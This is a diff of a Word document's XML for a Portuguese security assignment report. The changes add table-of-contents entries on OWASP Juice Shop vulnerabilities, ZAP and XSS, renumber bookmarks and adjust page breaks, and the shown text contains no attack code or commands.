-              <w:instrText xml:space="preserve"> PAGEREF _Toc213030680 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038601 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1583,6 +1583,676 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038602" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.2.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Falsos positivos e negativos</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038602 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038603" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>D – JuiceShop vulnerabilidades</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038603 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038604" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.3.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Login</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038604 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038605" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.3.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Zap admin password</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038605 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038606" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.3.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Zap desafio</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038606 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038607" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.3.4.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Cross-site Scripting (XSS)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038607 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213038608" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2.3.5.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Cross-site Scripting (XSS) ataques</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213038608 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1690,62 +2360,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:ind w:firstLine="720"/>
         <w:rPr>
@@ -1753,12 +2367,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc213030668"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc213038589"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Introdução</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
@@ -1790,7 +2405,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc213030669"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc213038590"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1972,7 +2587,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc213030670"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc213038591"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2078,7 +2693,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="3315ADBC">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="7C60E0F2">
             <wp:extent cx="3333750" cy="2824514"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
             <wp:docPr id="797099606" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
@@ -2353,7 +2968,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t xml:space="preserve">Na figura 1 e 2, podemos ver que ambos os programas estão inicializados e a responder com o </w:t>
       </w:r>
@@ -2402,12 +3016,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc213030671"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc213038592"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Vulnerabilidade</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
@@ -2908,7 +3523,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc213030672"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc213038593"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3265,7 +3880,6 @@
           <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AA9B26" wp14:editId="65E10B80">
             <wp:extent cx="3098800" cy="869678"/>
@@ -3410,6 +4024,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -3875,7 +4490,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc213030673"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc213038594"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3904,7 +4519,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc213030674"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc213038595"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3926,7 +4541,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc213030675"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc213038596"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3982,15 +4597,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">). Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O CodeQL vê o código a ser analisado como uma base dados, permitindo assim </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">ao utilizador procurar por vulnerabilidade através de </w:t>
+        <w:t xml:space="preserve">). Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O CodeQL vê o código a ser analisado como uma base dados, permitindo assim ao utilizador procurar por vulnerabilidade através de </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4021,7 +4628,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc213030676"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc213038597"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4140,6 +4747,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Para tal utilizou-se a QL </w:t>
       </w:r>
       <w:r>
@@ -4438,7 +5046,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc213030677"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc213038598"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4976,7 +5584,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
       <w:r>
@@ -5224,6 +5831,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Se um utilizador malicioso descobrir este segredo (A.4.c), poderá enviar pedidos validos para estes </w:t>
       </w:r>
       <w:r>
@@ -5271,7 +5879,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc213030678"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc213038599"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5307,7 +5915,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc213030679"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc213038600"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5521,7 +6129,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc213030680"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc213038601"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -5748,6 +6356,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc213038602"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5755,6 +6364,7 @@
